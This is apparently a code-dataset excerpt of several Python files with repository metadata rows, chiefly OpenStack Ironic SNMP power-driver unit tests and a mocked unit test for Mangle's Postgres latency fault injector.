mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
def _test_simple_device_power_on(self, snmp_driver, mock_get_client):
# Ensure a simple device driver powers on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def _test_simple_device_power_off(self, snmp_driver, mock_get_client):
# Ensure a simple device driver powers off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
def _test_simple_device_power_reset(self, snmp_driver, mock_get_client):
# Ensure a simple device driver resets correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
def test_apc_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# driver
self._update_driver_info(snmp_driver="apc",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 4, 4, 2, 1, 3, 3)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_apc_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc', mock_get_client)
def test_apc_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc', mock_get_client)
def test_apc_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc', mock_get_client)
def test_apc_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc', mock_get_client)
def test_apc_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc', mock_get_client)
def test_apc_masterswitch_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# masterswitch driver
self._update_driver_info(snmp_driver="apc_masterswitch",
snmp_outlet="6")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 4, 4, 2, 1, 3, 6)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_apc_masterswitch_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc_masterswitch',
mock_get_client)
def test_apc_masterswitch_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc_masterswitch',
mock_get_client)
def test_apc_masterswitch_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc_masterswitch', mock_get_client)
def test_apc_masterswitch_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc_masterswitch', mock_get_client)
def test_apc_masterswitch_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc_masterswitch',
mock_get_client)
def test_apc_masterswitchplus_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# masterswitchplus driver
self._update_driver_info(snmp_driver="apc_masterswitchplus",
snmp_outlet="6")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 6, 5, 1, 1, 5, 6)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(3, driver.value_power_off)
def test_apc_masterswitchplus_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc_masterswitchplus',
mock_get_client)
def test_apc_masterswitchplus_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc_masterswitchplus',
mock_get_client)
def test_apc_rackpdu_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the APC
# rackpdu driver
self._update_driver_info(snmp_driver="apc_rackpdu",
snmp_outlet="6")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 318, 1, 1, 12, 3, 3, 1, 1, 4, 6)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_apc_rackpdu_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('apc_rackpdu', mock_get_client)
def test_apc_rackpdu_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('apc_rackpdu',
mock_get_client)
def test_apc_rackpdu_power_on(self, mock_get_client):
self._test_simple_device_power_on('apc_rackpdu', mock_get_client)
def test_apc_rackpdu_power_off(self, mock_get_client):
self._test_simple_device_power_off('apc_rackpdu', mock_get_client)
def test_apc_rackpdu_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('apc_rackpdu', mock_get_client)
def test_aten_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the
# Aten driver
self._update_driver_info(snmp_driver="aten",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 21317, 1, 3, 2, 2, 2, 2, 3, 0)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(2, driver.value_power_on)
self.assertEqual(1, driver.value_power_off)
def test_aten_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('aten', mock_get_client)
def test_aten_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('aten', mock_get_client)
def test_aten_power_on(self, mock_get_client):
self._test_simple_device_power_on('aten', mock_get_client)
def test_aten_power_off(self, mock_get_client):
self._test_simple_device_power_off('aten', mock_get_client)
def test_aten_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('aten', mock_get_client)
def test_cyberpower_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the
# CyberPower driver
self._update_driver_info(snmp_driver="cyberpower",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 3808, 1, 1, 3, 3, 3, 1, 1, 4, 3)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(1, driver.value_power_on)
self.assertEqual(2, driver.value_power_off)
def test_cyberpower_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('cyberpower', mock_get_client)
def test_cyberpower_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('cyberpower', mock_get_client)
def test_cyberpower_power_on(self, mock_get_client):
self._test_simple_device_power_on('cyberpower', mock_get_client)
def test_cyberpower_power_off(self, mock_get_client):
self._test_simple_device_power_off('cyberpower', mock_get_client)
def test_cyberpower_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('cyberpower', mock_get_client)
def test_teltronix_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the
# Teltronix driver
self._update_driver_info(snmp_driver="teltronix",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
oid = (1, 3, 6, 1, 4, 1, 23620, 1, 2, 2, 1, 4, 3)
self.assertEqual(oid, driver._snmp_oid())
self.assertEqual(2, driver.value_power_on)
self.assertEqual(1, driver.value_power_off)
def test_teltronix_power_state_on(self, mock_get_client):
self._test_simple_device_power_state_on('teltronix', mock_get_client)
def test_teltronix_power_state_off(self, mock_get_client):
self._test_simple_device_power_state_off('teltronix', mock_get_client)
def test_teltronix_power_on(self, mock_get_client):
self._test_simple_device_power_on('teltronix', mock_get_client)
def test_teltronix_power_off(self, mock_get_client):
self._test_simple_device_power_off('teltronix', mock_get_client)
def test_teltronix_power_reset(self, mock_get_client):
self._test_simple_device_power_reset('teltronix', mock_get_client)
def test_eaton_power_snmp_objects(self, mock_get_client):
# Ensure the correct SNMP object OIDs and values are used by the Eaton
# Power driver
self._update_driver_info(snmp_driver="eatonpower",
snmp_outlet="3")
driver = snmp._get_driver(self.node)
status_oid = (1, 3, 6, 1, 4, 1, 534, 6, 6, 7, 6, 6, 1, 2, 3)
poweron_oid = (1, 3, 6, 1, 4, 1, 534, 6, 6, 7, 6, 6, 1, 3, 3)
poweroff_oid = (1, 3, 6, 1, 4, 1, 534, 6, 6, 7, 6, 6, 1, 4, 3)
self.assertEqual(status_oid, driver._snmp_oid(driver.oid_status))
self.assertEqual(poweron_oid, driver._snmp_oid(driver.oid_poweron))
self.assertEqual(poweroff_oid, driver._snmp_oid(driver.oid_poweroff))
self.assertEqual(0, driver.status_off)
self.assertEqual(1, driver.status_on)
self.assertEqual(2, driver.status_pending_off)
self.assertEqual(3, driver.status_pending_on)
def test_eaton_power_power_state_on(self, mock_get_client):
# Ensure the Eaton Power driver queries on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_ON, pstate)
def test_eaton_power_power_state_off(self, mock_get_client):
# Ensure the Eaton Power driver queries off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_OFF, pstate)
def test_eaton_power_power_state_pending_off(self, mock_get_client):
# Ensure the Eaton Power driver queries pending off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_pending_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_ON, pstate)
def test_eaton_power_power_state_pending_on(self, mock_get_client):
# Ensure the Eaton Power driver queries pending on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_pending_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_OFF, pstate)
def test_eaton_power_power_on(self, mock_get_client):
# Ensure the Eaton Power driver powers on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_on
pstate = driver.power_on()
mock_client.set.assert_called_once_with(
driver._snmp_oid(driver.oid_poweron), driver.value_power_on)
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_ON, pstate)
def test_eaton_power_power_off(self, mock_get_client):
# Ensure the Eaton Power driver powers off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.status_off
pstate = driver.power_off()
mock_client.set.assert_called_once_with(
driver._snmp_oid(driver.oid_poweroff), driver.value_power_off)
mock_client.get.assert_called_once_with(
driver._snmp_oid(driver.oid_status))
self.assertEqual(states.POWER_OFF, pstate)
def test_eaton_power_power_reset(self, mock_get_client):
# Ensure the Eaton Power driver resets correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver("eatonpower")
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.status_off, driver.status_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(driver.oid_poweroff),
driver.value_power_off),
mock.call(driver._snmp_oid(driver.oid_poweron),
driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid(driver.oid_status))] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(snmp, '_get_driver', autospec=True)
class SNMPDriverTestCase(db_base.DbTestCase):
"""SNMP power driver interface tests.
In this test case, the SNMP power driver interface is exercised. The
device-specific SNMP driver is mocked to allow various error cases to be
tested.
"""
def setUp(self):
super(SNMPDriverTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_snmp')
self.node = obj_utils.create_test_node(self.context,
driver='fake_snmp',
driver_info=INFO_DICT)
def _get_snmp_failure(self):
return exception.SNMPFailure(operation='test-operation',
error='test-error')
def test_get_properties(self, mock_get_driver):
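        # get_properties() should return the common SNMP driver properties.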
expected = snmp.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertEqual(expected, task.driver.get_properties())
def test_get_power_state_on(self, mock_get_driver):
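        # get_power_state() should report POWER_ON when the device driver does.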
mock_driver = mock_get_driver.return_value
mock_driver.power_state.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid) as task:
pstate = task.driver.power.get_power_state(task)
mock_driver.power_state.assert_called_once_with()
self.assertEqual(states.POWER_ON, pstate)
def test_get_power_state_off(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_state.return_value = states.POWER_OFF
with task_manager.acquire(self.context, self.node.uuid) as task:
pstate = task.driver.power.get_power_state(task)
mock_driver.power_state.assert_called_once_with()
self.assertEqual(states.POWER_OFF, pstate)
def test_get_power_state_error(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_state.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
pstate = task.driver.power.get_power_state(task)
mock_driver.power_state.assert_called_once_with()
self.assertEqual(states.ERROR, pstate)
def test_get_power_state_snmp_failure(self, mock_get_driver):
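        # An SNMPFailure from the device driver should propagate out of get_power_state().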
mock_driver = mock_get_driver.return_value
mock_driver.power_state.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.get_power_state, task)
mock_driver.power_state.assert_called_once_with()
def test_set_power_state_on(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_on.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.power.set_power_state(task, states.POWER_ON)
mock_driver.power_on.assert_called_once_with()
def test_set_power_state_off(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_off.return_value = states.POWER_OFF
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.power.set_power_state(task, states.POWER_OFF)
mock_driver.power_off.assert_called_once_with()
def test_set_power_state_error(self, mock_get_driver):
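        # Requesting an unsupported power state should raise InvalidParameterValue.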
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.set_power_state,
task, states.ERROR)
def test_set_power_state_on_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_on.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.set_power_state,
task, states.POWER_ON)
mock_driver.power_on.assert_called_once_with()
def test_set_power_state_off_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_off.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.set_power_state,
task, states.POWER_OFF)
mock_driver.power_off.assert_called_once_with()
def test_set_power_state_on_timeout(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_on.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_ON)
mock_driver.power_on.assert_called_once_with()
def test_set_power_state_off_timeout(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_off.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.set_power_state,
task, states.POWER_OFF)
mock_driver.power_off.assert_called_once_with()
def test_reboot(self, mock_get_driver):
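        # reboot() should delegate to the device driver's power_reset().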
mock_driver = mock_get_driver.return_value
mock_driver.power_reset.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid) as task:
task.driver.power.reboot(task)
mock_driver.power_reset.assert_called_once_with()
def test_reboot_snmp_failure(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_reset.side_effect = self._get_snmp_failure()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.SNMPFailure,
task.driver.power.reboot, task)
mock_driver.power_reset.assert_called_once_with()
def test_reboot_timeout(self, mock_get_driver):
mock_driver = mock_get_driver.return_value
mock_driver.power_reset.return_value = states.ERROR
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.PowerStateFailure,
task.driver.power.reboot, task)
mock_driver.power_reset.assert_called_once_with()
| 48.908807 | 79 | 0.671777 | 8,108 | 62,750 | 4.828564 | 0.038481 | 0.033614 | 0.053129 | 0.034227 | 0.905006 | 0.887688 | 0.869349 | 0.854355 | 0.827075 | 0.79553 | 0 | 0.006509 | 0.243506 | 62,750 | 1,282 | 80 | 48.946958 | 0.818222 | 0.090853 | 0 | 0.64965 | 0 | 0 | 0.033309 | 0.005941 | 0 | 0 | 0 | 0 | 0.226226 | 1 | 0.142142 | false | 0.003003 | 0.014014 | 0.003003 | 0.163163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c8de328f893e7e0d60815f5880ec363719f9035 | 31 | py | Python | sarafi/lcg.py | supakeen/sarafi | 6a7177ab0cbec3986570c415b84f794159905862 | ["MIT"] | null | null | null | sarafi/lcg.py | supakeen/sarafi | 6a7177ab0cbec3986570c415b84f794159905862 | ["MIT"] | null | null | null | sarafi/lcg.py | supakeen/sarafi | 6a7177ab0cbec3986570c415b84f794159905862 | ["MIT"] | null | null | null | import sarafi._lib.lcg as _lcg
| 15.5 | 30 | 0.806452 | 6 | 31 | 3.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98bccc5977adbaf6dbdbdea603d9c8c47d826aac | 74 | py | Python | anime_dl/common/__init__.py | tiagotda/anime-dl | d3c114faaa7586b4e1111efa2cf79d4640d4f6a9 | ["MIT"] | 246 | 2017-03-04T20:17:19.000Z | 2022-03-28T13:37:16.000Z | anime_dl/common/__init__.py | EpicUnknown/anime-dl | 753ae274243c3c4d52050f0c09778d9278112d4a | ["MIT"] | 114 | 2017-03-05T23:30:04.000Z | 2021-01-17T03:57:59.000Z | anime_dl/common/__init__.py | EpicUnknown/anime-dl | 753ae274243c3c4d52050f0c09778d9278112d4a | ["MIT"] | 59 | 2017-03-05T03:00:53.000Z | 2022-01-08T11:23:21.000Z | from . import browser_instance
from . import downloader
from . import misc | 24.666667 | 30 | 0.810811 | 10 | 74 | 5.9 | 0.6 | 0.508475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148649 | 74 | 3 | 31 | 24.666667 | 0.936508 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98c68bba6ac295d08edc2621b79140629313c2a3 | 74 | py | Python | e6/6.py | neutronest/eulerproject-douby | 0f3d6d01ef3a12a7a8f0c92c12302d154c3bb870 | ["MIT"] | 4 | 2015-11-05T09:02:07.000Z | 2021-08-06T15:24:30.000Z | e6/6.py | neutronest/eulerproject-douby | 0f3d6d01ef3a12a7a8f0c92c12302d154c3bb870 | ["MIT"] | null | null | null | e6/6.py | neutronest/eulerproject-douby | 0f3d6d01ef3a12a7a8f0c92c12302d154c3bb870 | ["MIT"] | 2 | 2015-02-10T05:29:14.000Z | 2016-05-02T14:54:52.000Z | print sum(range(1, 101)) ** 2 - sum(map(lambda x: x ** 2, range(1, 101)))
| 37 | 73 | 0.567568 | 15 | 74 | 2.8 | 0.6 | 0.285714 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163934 | 0.175676 | 74 | 1 | 74 | 74 | 0.52459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
98dc7dddec4c8c83475e2a71b5392aac12bf00f3 | 208 | py | Python | surgeo/db/__init__.py | yashd94/surgeo | dc449b7332e143d97321bc844739840c4b0c3666 | ["MIT"] | null | null | null | surgeo/db/__init__.py | yashd94/surgeo | dc449b7332e143d97321bc844739840c4b0c3666 | ["MIT"] | null | null | null | surgeo/db/__init__.py | yashd94/surgeo | dc449b7332e143d97321bc844739840c4b0c3666 | ["MIT"] | null | null | null |
# Add functions to surgeo.db namespace
from surgeo.db.unsupress import reconstitute_data
from surgeo.db.db_setup_geocode import setup_geocode_table
from surgeo.db.db_setup_surname import setup_surname_table
| 34.666667 | 58 | 0.870192 | 33 | 208 | 5.212121 | 0.454545 | 0.186047 | 0.209302 | 0.162791 | 0.22093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091346 | 208 | 5 | 59 | 41.6 | 0.910053 | 0.173077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
98f719aea43c9e3ce67f8b8cf7d6141bd7a22fc4 | 43 | py | Python | geoq/cors/middleware/__init__.py | kaydoh/geoq | 6f10818d0cc3cef4ba8113e8b047d27e79b2f8b0 | ["MIT"] | 471 | 2015-01-05T15:16:26.000Z | 2022-03-28T05:06:11.000Z | geoq/cors/middleware/__init__.py | kaydoh/geoq | 6f10818d0cc3cef4ba8113e8b047d27e79b2f8b0 | ["MIT"] | 109 | 2015-01-06T20:00:58.000Z | 2022-03-11T23:17:53.000Z | geoq/cors/middleware/__init__.py | kaydoh/geoq | 6f10818d0cc3cef4ba8113e8b047d27e79b2f8b0 | ["MIT"] | 100 | 2015-01-05T15:16:39.000Z | 2021-12-01T12:13:13.000Z | from .corsMiddleware import corsMiddleware
| 21.5 | 42 | 0.883721 | 4 | 43 | 9.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.974359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c737037cb8c73ba041dee0a1c163348cc488c1a9 | 9737 | py | Python | mangle-infra-agent/tests/PostgresTransactionLatencyFaultTest.py | vmaligireddy/mangle | caf4d4a1314a5bc073d686327483cc08c77ab7be | ["Apache-2.0"] | 151 | 2019-05-21T13:15:43.000Z | 2022-02-23T15:04:49.000Z | mangle-infra-agent/tests/PostgresTransactionLatencyFaultTest.py | vmaligireddy/mangle | caf4d4a1314a5bc073d686327483cc08c77ab7be | ["Apache-2.0"] | 80 | 2019-10-24T07:12:58.000Z | 2022-03-31T14:08:44.000Z | mangle-infra-agent/tests/PostgresTransactionLatencyFaultTest.py | vmaligireddy/mangle | caf4d4a1314a5bc073d686327483cc08c77ab7be | ["Apache-2.0"] | 45 | 2019-05-23T05:21:26.000Z | 2022-02-17T09:57:32.000Z | from unittest import TestCase
from unittest.mock import Mock, patch, MagicMock
import psycopg2
import unittest
import os
from Faults.FaultStatus import FaultStatus
from Faults.PostgresTransactionLatencyFault import PostgresTransactionLatencyFault
'''
Unit test cases for PostgresTransactionLatencyFault.
@author: kumargautam
'''
class PostgresTransactionLatencyFaultTest(TestCase):
@classmethod
def setUp(cls):
print("Called setUp() function")
cls.fault_args = {'--operation': 'inject', '--faultname': "pg_transaction_error_fault",
"--userName": "test",
"--password": "test", "--port": 5432, "--dbName": "test", "--sslEnabled": True,
"--tableName": "customer", "--percentage": 75, "--latency": 1000,
"--timeout": 1000,
"--faultId": "1234"}
cls.fault = PostgresTransactionLatencyFault(cls.fault_args)
def test_get_status(self):
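        # A newly constructed fault should report NOT_STARTED for its fault id.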
self.assertEqual(FaultStatus.NOT_STARTED.name, self.fault.get_status(self.fault_args.get('--faultId')))
@patch.object(psycopg2, 'connect')
def test_get_connection(self, psycopg2_patch):
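        # get_connection() should return a connection obtained via psycopg2.connect().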
connect_mock = Mock(name='connect_mock', spec=psycopg2)
psycopg2_patch.return_value = connect_mock._connect()
self.assertIsNotNone(self.fault.get_connection())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock._connect.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_test_connection(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
connect_mock.close.return_value = True
self.assertTrue(self.fault.test_connection())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_test_connection_for_not_connected(self, psycopg2_patch):
psycopg2_patch.return_value = None
self.assertFalse(self.fault.test_connection())
self.assertEqual(1, psycopg2_patch.call_count)
@patch.object(psycopg2, 'connect')
def test_test_connection_for_error(self, psycopg2_patch):
psycopg2_patch.side_effect = Exception("user_name/password not matched")
self.assertFalse(self.fault.test_connection())
self.assertEqual(1, psycopg2_patch.call_count)
def test_close_connection_for_error(self):
connect_mock = Mock(name='connect_mock')
connect_mock.close.side_effect = Exception("Close connection error")
self.fault.close_connection(connect_mock)
connect_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_table_exist(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.return_value = (True,)
cursor_mock.close.return_value = True
self.assertTrue(self.fault.is_table_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_table_exist_for_error(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.side_effect = Exception("Not able to fetch data from db")
cursor_mock.close.return_value = True
self.assertFalse(self.fault.is_table_exist())
self.assertEqual(1, psycopg2_patch.call_count)
connect_mock.cursor.assert_called_once()
connect_mock.close.assert_called_once()
cursor_mock.execute.assert_called_once()
cursor_mock.fetchone.assert_called_once()
cursor_mock.close.assert_called_once()
@patch.object(psycopg2, 'connect')
def test_is_trigger_exist(self, psycopg2_patch):
connect_mock = Mock(name='connect_mock')
psycopg2_patch.return_value = connect_mock
cursor_mock = Mock(name='cursor_mock')
connect_mock.cursor.return_value = cursor_mock
connect_mock.close.return_value = True
cursor_mock.execute.return_value = 1
cursor_mock.fetchone.return_value = (1,)
cursor_mock.close.return_value = True
self.assertTrue(self.fault.is_trigger_exist())
self.assertEqual(1, psycopg2_patch.call_count)
